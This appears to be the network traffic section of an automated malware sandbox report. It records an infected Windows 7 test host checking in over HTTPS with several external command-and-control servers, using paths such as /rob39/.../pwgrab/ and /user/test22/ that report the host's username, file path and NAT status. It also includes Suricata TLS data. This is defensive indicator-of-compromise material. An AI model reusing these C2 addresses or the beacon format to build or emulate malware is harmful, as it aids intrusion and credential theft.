Network Analysis
IP Address | Status | Action |
---|---|---|
103.26.251.214 | Active | Moloch |
12.158.156.51 | Active | Moloch |
137.27.167.58 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.217.25.14 | Active | Moloch |
24.182.101.64 | Active | Moloch |
45.164.80.94 | Active | Moloch |
67.212.241.127 | Active | Moloch |
67.79.117.70 | Active | Moloch |
72.180.57.176 | Active | Moloch |
75.87.15.158 | Active | Moloch |
95.217.228.176 | Active | Moloch |
98.6.170.206 | Active | Moloch |
Name | Response | Post-Analysis Lookup |
---|---|---|
150.134.208.175.b.barracudacentral.org | 127.0.0.2 | |
150.134.208.175.zen.spamhaus.org | ||
wtfismyip.com | 95.217.228.176 | |
150.134.208.175.cbl.abuseat.org |
- TCP Requests
-
-
192.168.56.102:49826 137.27.167.58:443
-
192.168.56.102:49797 172.217.25.14:443
-
192.168.56.102:49812 192.168.56.103:2869
-
192.168.56.102:49813 192.168.56.103:5357
-
192.168.56.102:49830 24.182.101.64:449
-
192.168.56.102:49823 45.164.80.94:447
-
192.168.56.102:49821 67.79.117.70:443
-
192.168.56.102:49814 72.180.57.176:443
-
192.168.56.102:49815 75.87.15.158:443
-
192.168.56.102:49816 95.217.228.176:80wtfismyip.com
-
192.168.56.102:49818 98.6.170.206:447
-
- UDP Requests
-
-
192.168.56.102:50839 164.124.101.2:53
-
192.168.56.102:54660 164.124.101.2:53
-
192.168.56.102:57660 164.124.101.2:53
-
192.168.56.102:61459 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:56752 239.255.255.250:1900
-
192.168.56.102:56754 239.255.255.250:3702
-
192.168.56.102:56756 239.255.255.250:3702
-
192.168.56.102:56758 239.255.255.250:3702
-
192.168.56.103:3702 192.168.56.102:56758
-
GET
200
https://72.180.57.176/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 72.180.57.176
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:48:58 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 75.87.15.158
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:01 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/jdtzrTn7D1fhJNbBNVH7NJBPBDzrN/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/jdtzrTn7D1fhJNbBNVH7NJBPBDzrN/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 75.87.15.158
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:03 GMT
Content-Type: text/plain
Content-Length: 1309
Connection: keep-alive
GET
200
https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 75.87.15.158
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:04 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 75.87.15.158
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:04 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CNetDownloadMng5575191179%5Cxzcountlb.dwn/0/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CNetDownloadMng5575191179%5Cxzcountlb.dwn/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 75.87.15.158
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:05 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/NAT%20status/client%20is%20behind%20NAT/0/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 75.87.15.158
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:05 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:35 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/1jdJTPhNJftt9llb5HDzBt1d1t3/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/1jdJTPhNJftt9llb5HDzBt1d1t3/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:35 GMT
Content-Type: text/plain
Content-Length: 1307
Connection: keep-alive
GET
200
https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:36 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:37 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/NAT%20status/client%20is%20behind%20NAT/0/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:37 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
403
https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/10/62/QHAVHUMUVKIZYSUYVK/7/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/10/62/QHAVHUMUVKIZYSUYVK/7/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
HTTP/1.1 403 Forbidden
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:38 GMT
Content-Length: 9
Connection: keep-alive
GET
404
https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/23/2000027/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/23/2000027/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
HTTP/1.1 404 Not Found
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:38 GMT
Content-Length: 9
Connection: keep-alive
GET
200
https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/DNSBL/listed/0/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/DNSBL/listed/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:41 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/1/pxPtLlVV7rz3hFHPxXVH9ntpH3/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/1/pxPtLlVV7rz3hFHPxXVH9ntpH3/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:41 GMT
Content-Type: text/plain
Content-Length: 121
Connection: keep-alive
GET
200
https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:58 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/JXX9LFPNtFT75Htn3nVXhlnxNLP/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/JXX9LFPNtFT75Htn3nVXhlnxNLP/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:59 GMT
Content-Type: text/plain
Content-Length: 1307
Connection: keep-alive
GET
200
https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:50:00 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:50:01 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/1/4j4pxaBWesD3gH7yYCXrlLdHM/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/1/4j4pxaBWesD3gH7yYCXrlLdHM/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:50:01 GMT
Content-Type: text/plain
Content-Length: 120
Connection: keep-alive
GET
200
https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/10/62/707854/0/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/10/62/707854/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:50:02 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/pwgrab/sTart%20Run%20D%20failed/0/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/pwgrab/sTart%20Run%20D%20failed/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:50:02 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/pwgrab64/reload1/0/
REQUEST
RESPONSE
BODY
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/pwgrab64/reload1/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:50:03 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
http://wtfismyip.com/text
REQUEST
RESPONSE
BODY
GET /text HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: wtfismyip.com
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET
Access-Control-Allow-Origin: *
Content-Type: text/plain
Date: Tue, 30 Mar 2021 01:49:02 GMT
Content-Length: 16
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49814 72.180.57.176:443 |
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | a1:ea:a4:fa:0a:5e:ba:b9:c1:46:42:a3:0b:3e:a6:e7:b4:e2:f7:f0 |
TLSv1 192.168.56.102:49823 45.164.80.94:447 |
C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd | C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd | f1:ae:ef:9b:5f:b8:da:ca:2f:e8:b4:99:1d:16:71:ca:08:11:be:e4 |
TLSv1 192.168.56.102:49815 75.87.15.158:443 |
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | 81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79 |
TLSv1 192.168.56.102:49821 67.79.117.70:443 |
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | 81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79 |
TLSv1 192.168.56.102:49818 98.6.170.206:447 |
C=US, ST=Some-State, O=Internet Widgits Pty Ltd | C=US, ST=Some-State, O=Internet Widgits Pty Ltd | 8d:b6:86:81:b0:6b:e5:0a:58:13:73:ec:a7:95:6f:f6:4b:e2:e9:d8 |
TLSv1 192.168.56.102:49826 137.27.167.58:443 |
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | 81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79 |
TLSv1 192.168.56.102:49830 24.182.101.64:449 |
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | 81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79 |
Snort Alerts
No Snort Alerts